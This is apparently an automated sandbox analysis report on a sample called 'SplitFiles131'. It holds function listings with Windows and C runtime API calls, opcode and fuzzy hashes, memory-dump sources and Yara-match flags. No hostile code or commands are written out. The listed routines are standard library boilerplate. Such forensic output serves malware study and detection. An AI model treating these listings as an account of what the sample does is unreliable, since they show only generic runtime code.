                                          • Instruction ID: dd5676bbc38bf4ddee88e11de66148e0d133859b732eb0a2b9d7e3b8ef29f219
                                          • Opcode Fuzzy Hash: 2ac9717b4801cc9c3e4fb2398baf62dd1adc69d55e91d29d558fb5eaeb849720
                                          • Instruction Fuzzy Hash: 7051B571A00704AFDB119F2ACC41BAAB7F5EF48724F14056EE809D7794E739E981CB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040CB26
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040CB46
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB66
                                          • std::_Facet_Register.LIBCPMT ref: 0040CC01
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040CC19
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                          • String ID:
                                          • API String ID: 459529453-0
                                          • Opcode ID: 87b63e902258446f7da7e1067b62c0637823b51c00972e01863bc4e59d6f7a1c
                                          • Instruction ID: 4299aa7d4a227c1bcf07fbc90c3f6f33ea46ae6c1256ae29d36ea46de7090174
                                          • Opcode Fuzzy Hash: 87b63e902258446f7da7e1067b62c0637823b51c00972e01863bc4e59d6f7a1c
                                          • Instruction Fuzzy Hash: F641BE71A00215CBCB10DF56E982B6EB7B4EF40714F24457EE8067B382DB79AD45CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                          • String ID:
                                          • API String ID: 3136044242-0
                                          • Opcode ID: 52375cf17bb0d101189a85c26acd30f86b67d56865f3d0828ade5b8236379d4d
                                          • Instruction ID: 4eae28f9cec24adab2deedadfa513907509d2ff78710b81ad0a66de0a83b0cb4
                                          • Opcode Fuzzy Hash: 52375cf17bb0d101189a85c26acd30f86b67d56865f3d0828ade5b8236379d4d
                                          • Instruction Fuzzy Hash: D8217F71D04A65BAFB23CE64DC45A6F3BADEB846D1F018115FC046B228D7309E419BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 00425AFE
                                            • Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
                                            • Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0
                                          • _free.LIBCMT ref: 00425B10
                                          • _free.LIBCMT ref: 00425B22
                                          • _free.LIBCMT ref: 00425B34
                                          • _free.LIBCMT ref: 00425B46
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: ecef4e8d75fb8ce96c2f369775812b1e7556ebdaa90a8c02d54b4a4fccf6128e
                                          • Instruction ID: 60f62acaf68e8d6c11223a2e69ab09c63260fcc0bd08be4ea5654f22acdb9dbb
                                          • Opcode Fuzzy Hash: ecef4e8d75fb8ce96c2f369775812b1e7556ebdaa90a8c02d54b4a4fccf6128e
                                          • Instruction Fuzzy Hash: B5F03632A44614ABDA24EB66F891C5BBBDDAA007147E4185BFC0CD7741CB78FCC0866C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 96f50b6fd2803bd5c4bda2139404532c31f5521687e24c4fa50f21b7b3d75918
                                          • Instruction ID: b796e144102367d81c75d730982b4c61d5d1dbfd69c6644539770f527747fe0f
                                          • Opcode Fuzzy Hash: 96f50b6fd2803bd5c4bda2139404532c31f5521687e24c4fa50f21b7b3d75918
                                          • Instruction Fuzzy Hash: 39F09632404200B7EA60DF76F985C5773F9AA04B14B94880BF044D7A64CB78FCC0965C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 1000BAB3
                                            • Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
                                            • Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729
                                          • _free.LIBCMT ref: 1000BAC5
                                          • _free.LIBCMT ref: 1000BAD7
                                          • _free.LIBCMT ref: 1000BAE9
                                          • _free.LIBCMT ref: 1000BAFB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 5fb86163ccc0cf36f5f605bb33fc0d434e280abf0fbc2f313962ea386a657b11
                                          • Instruction ID: 322c929f8fa3144f5d3f5fbca3afb4a8048b16d2c69f3c46f8cc95a9a1cb27b8
                                          • Opcode Fuzzy Hash: 5fb86163ccc0cf36f5f605bb33fc0d434e280abf0fbc2f313962ea386a657b11
                                          • Instruction Fuzzy Hash: 30F0F431618A209BEA54DF68E8C2C1A73E9FB057E07B08809F49CD754DCB32FC808B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: *?
                                          • API String ID: 269201875-2564092906
                                          • Opcode ID: 76b620e72b1dbb4dfcec853c55e4519de0bd11c3334c3aa31fb4d74e4a998a5d
                                          • Instruction ID: 94cf888e9de60d1963efd33ec482e46fa66187b9afba07f34032ac2584db377d
                                          • Opcode Fuzzy Hash: 76b620e72b1dbb4dfcec853c55e4519de0bd11c3334c3aa31fb4d74e4a998a5d
                                          • Instruction Fuzzy Hash: 1F613075E002199FEF14DFA9C8815EEFBF5EF48314B24816AE815F7310E6359E818B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID: *?
                                          • API String ID: 269201875-2564092906
                                          • Opcode ID: 72a3e4ca702a8c4f9c99998b4a73be40bf4d94a3e87db8c17ad137306030f0af
                                          • Instruction ID: 0340fc811119e07594000e71e8d06bdc8eabf6b4f8489cd8c2a7edce7445303f
                                          • Opcode Fuzzy Hash: 72a3e4ca702a8c4f9c99998b4a73be40bf4d94a3e87db8c17ad137306030f0af
                                          • Instruction Fuzzy Hash: E0617EB5E0021A9FEB14CFA9C8819DDFBF5FF48390B25816AE815F7344D631AE418B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 004218E8
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 00421945
                                          • __freea.LIBCMT ref: 0042194E
                                            • Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeapStringType__alloca_probe_16__freea
                                          • String ID: tIB
                                          • API String ID: 2035984020-366005614
                                          • Opcode ID: eda957cfb15ef7941afacb619c8722be3406a97b873fedbfb145e6bb9f7ac986
                                          • Instruction ID: e53cbf2fbd7e5de764d6e10ddde7606d24dd4c66cd89eb36cbd394391ca5fa72
                                          • Opcode Fuzzy Hash: eda957cfb15ef7941afacb619c8722be3406a97b873fedbfb145e6bb9f7ac986
                                          • Instruction Fuzzy Hash: A831D2B1A0022AABDB209F66DC41DEF7BB5EF54314F45416AFC04A7261D738C991CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
                                            • Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90
                                          • __Init_thread_footer.LIBCMT ref: 00401363
                                            • Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
                                            • Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
                                            • Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                          • String ID: L\O\$W$^.
                                          • API String ID: 2296764815-2954420958
                                          • Opcode ID: 466d19772e7674810153093e6f61bbe3c851cf9c15c590cddcd6ca1366938e27
                                          • Instruction ID: ee1b09ab654b966cb7d5fff89a1237d5bce974de8ca2d720cb455b5a0ca2e737
                                          • Opcode Fuzzy Hash: 466d19772e7674810153093e6f61bbe3c851cf9c15c590cddcd6ca1366938e27
                                          • Instruction Fuzzy Hash: 8321243890074486E710AFB4EC4776D7370BF45309F24867AD8492A6F3E7B9A588CB4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: 0ca896192a9c401899d42e9f7ec41fae97fe56b9a9dc6cb600518f1b51295347
                                          • Instruction ID: 6bd07d1b73092418ee2073320d9761de18afaf30efd0c82ef62646a350b6d03e
                                          • Opcode Fuzzy Hash: 0ca896192a9c401899d42e9f7ec41fae97fe56b9a9dc6cb600518f1b51295347
                                          • Instruction Fuzzy Hash: 63510172605206AFDB289F51D881BFA77A4FF04304F14012FEA05976A1D779ECC2CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: d7e06759a182467ecbddfc5be9e71537fdf669dd7d98f9716886f151031a7616
                                          • Instruction ID: c86ceda4d1325f0568557c1dae7b0478574bf977d686f1191d636807e4b9891e
                                          • Opcode Fuzzy Hash: d7e06759a182467ecbddfc5be9e71537fdf669dd7d98f9716886f151031a7616
                                          • Instruction Fuzzy Hash: 5D5103B6A04606AFFB18CF50C841B6A77A4EF403D1F12412DED0687199EF32EC40C799
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 0042B40E
                                          • _free.LIBCMT ref: 0042B437
                                          • SetEndOfFile.KERNEL32(00000000,0042860C,00000000,0041E0F8,?,?,?,?,?,?,?,0042860C,0041E0F8,00000000), ref: 0042B469
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,0042860C,0041E0F8,00000000,?,?,?,?,00000000), ref: 0042B485
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFileLast
                                          • String ID:
                                          • API String ID: 1547350101-0
                                          • Opcode ID: de3f6e69295ed1edb17ce482ba4b705cbafdd08ef7baa43635d14e82ea768746
                                          • Instruction ID: 617302695e0eac8ad5dd037765c23ffc959c8119500e3a216ad439764ca44a70
                                          • Opcode Fuzzy Hash: de3f6e69295ed1edb17ce482ba4b705cbafdd08ef7baa43635d14e82ea768746
                                          • Instruction Fuzzy Hash: 59411C72B00625ABDB11AFAA9C82B9E3779EF44324F54011BF814D7292D77CC98147AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00419D78: _free.LIBCMT ref: 00419D86
                                            • Part of subcall function 00420094: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,004213AE,?,00000000,00000000), ref: 00420140
                                          • GetLastError.KERNEL32 ref: 00423BD7
                                          • __dosmaperr.LIBCMT ref: 00423BDE
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00423C1D
                                          • __dosmaperr.LIBCMT ref: 00423C24
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                          • String ID:
                                          • API String ID: 167067550-0
                                          • Opcode ID: acb329c430d9d65b703508cc3e81db56fa1fb9c9c168a09e4ae2cbd405f6ca47
                                          • Instruction ID: faa5b2d0112470651306ec9e949e2660e7ba13f531a9181b1b827704a780be5a
                                          • Opcode Fuzzy Hash: acb329c430d9d65b703508cc3e81db56fa1fb9c9c168a09e4ae2cbd405f6ca47
                                          • Instruction Fuzzy Hash: 8021F472300229AFDB205F67AC81D6BBBBDEF00369790851EF91597241D73CEE418798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 100098E4: _free.LIBCMT ref: 100098F2
                                            • Part of subcall function 1000A4B8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000D2A0,?,00000000,00000000), ref: 1000A564
                                          • GetLastError.KERNEL32 ref: 1000932A
                                          • __dosmaperr.LIBCMT ref: 10009331
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10009370
                                          • __dosmaperr.LIBCMT ref: 10009377
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                          • String ID:
                                          • API String ID: 167067550-0
                                          • Opcode ID: 6740b73893a9458362bcae6edf410e802fc9121dd722963b93f7f203b79a7553
                                          • Instruction ID: 0ddff17f411571237369bc97fdb35948c87631787bb5b9b786b2356b208bbcd2
                                          • Opcode Fuzzy Hash: 6740b73893a9458362bcae6edf410e802fc9121dd722963b93f7f203b79a7553
                                          • Instruction Fuzzy Hash: 6B21B07560021AAFFB10DF618C81D1BB7ADEF442E47118618F968972D5EB70ED509BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000), ref: 0041CB68
                                          • _free.LIBCMT ref: 0041CBC5
                                          • _free.LIBCMT ref: 0041CBFB
                                          • SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: 3abb266c486aac477022de17da07e4251c7c1e35108d8638f05dcf1e3eb67359
                                          • Instruction ID: 91b981631096f111d83687cb3943ae5f68f73b373ba64f4aa9f78fd4ccd23e5c
                                          • Opcode Fuzzy Hash: 3abb266c486aac477022de17da07e4251c7c1e35108d8638f05dcf1e3eb67359
                                          • Instruction Fuzzy Hash: 2411CA766881006BDB1526776CC6EEB21599BC0778B24023BF528D32D1EE6D8CC2516D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,100064BF,?,10002482,00000000), ref: 10007BB1
                                          • _free.LIBCMT ref: 10007C0E
                                          • _free.LIBCMT ref: 10007C44
                                          • SetLastError.KERNEL32(00000000,0000000A,000000FF,?,100064BF,?,10002482,00000000), ref: 10007C4F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: c9421031c8270037eee8d98a36a9266b2192190dd1963cf3c890ea5dd8583a89
                                          • Instruction ID: 40064ac180ed46dbc898ff0431a2854e633d7821ece77d32e9ad52d9302bdc28
                                          • Opcode Fuzzy Hash: c9421031c8270037eee8d98a36a9266b2192190dd1963cf3c890ea5dd8583a89
                                          • Instruction Fuzzy Hash: 2E11E976A04615BAF212D7784CC1E1B3699FBC02F4B324528F55C821EDEF75ED414320
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,004135F6,0041ED72,?,?,0040FF9B,?,?,?,?,?,00403757,?,?), ref: 0041CCBF
                                          • _free.LIBCMT ref: 0041CD1C
                                          • _free.LIBCMT ref: 0041CD52
                                          • SetLastError.KERNEL32(00000000,00000007,000000FF,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041CD5D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: e8b5fd6ac6bcdbc63dd879f339bbd85be9c8e0b1b4a1cafcd1e0970895d8910c
                                          • Instruction ID: 9b62fba310747dd0c1bf6bb4efed2382b058d2b05c29c2c7201b5ba533af619d
                                          • Opcode Fuzzy Hash: e8b5fd6ac6bcdbc63dd879f339bbd85be9c8e0b1b4a1cafcd1e0970895d8910c
                                          • Instruction Fuzzy Hash: C011AC367442006BDB11277B6CC5DE72659ABC1779724023BF92C931D1ED6D8CC2456D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,1000640B,10008727,?,?,100074AC), ref: 10007D08
                                          • _free.LIBCMT ref: 10007D65
                                          • _free.LIBCMT ref: 10007D9B
                                          • SetLastError.KERNEL32(00000000,0000000A,000000FF,?,?,1000640B,10008727,?,?,100074AC), ref: 10007DA6
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: a1b51e29a2483d9d067290d82e8b33bd0401e2047f5f7481da3912e5413e3180
                                          • Instruction ID: 68182e47bee727d8c9ea21c39a6ce122361ce54ca7b3a3919661bbd41b246de3
                                          • Opcode Fuzzy Hash: a1b51e29a2483d9d067290d82e8b33bd0401e2047f5f7481da3912e5413e3180
                                          • Instruction Fuzzy Hash: 38110476B04615BAF212D7788CC1D2B26BAFFC02F0B314226F56C821EEDE75ED514221
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043F04D
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043F066
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value___vcrt_
                                          • String ID:
                                          • API String ID: 1426506684-0
                                          • Opcode ID: bbd0fb90c6f543932e03e6b2f5c9411f0a441a56121ea3fd60b0444541a7708f
                                          • Instruction ID: 2f914ca0b150f54681f4df5d10c51623e56e86357141abab0502ee71ee4cbc58
                                          • Opcode Fuzzy Hash: bbd0fb90c6f543932e03e6b2f5c9411f0a441a56121ea3fd60b0444541a7708f
                                          • Instruction Fuzzy Hash: 80012D33D083119DA62967BDBC855AB2B65DB1C378F20133FF620902F2EF594C19914C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000), ref: 0042B809
                                          • GetLastError.KERNEL32(?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000,?,00000000,?,004210DE,?), ref: 0042B815
                                            • Part of subcall function 0042B7DB: CloseHandle.KERNEL32(FFFFFFFE,0042B825,?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000,?,00000000), ref: 0042B7EB
                                          • ___initconout.LIBCMT ref: 0042B825
                                            • Part of subcall function 0042B79D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0042B7CC,0042A4E3,00000000,?,00420B92,?,00000000,00000000,?), ref: 0042B7B0
                                          • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000,?), ref: 0042B83A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 3771de78c200026101a5c29d47a2f31da0f5e9a11cf076d30a3b181c11986b3a
                                          • Instruction ID: ac75466029322dda25ac2c1e9c6ff5057a4b7c88608daf2fa63318e0ae8d8abe
                                          • Opcode Fuzzy Hash: 3771de78c200026101a5c29d47a2f31da0f5e9a11cf076d30a3b181c11986b3a
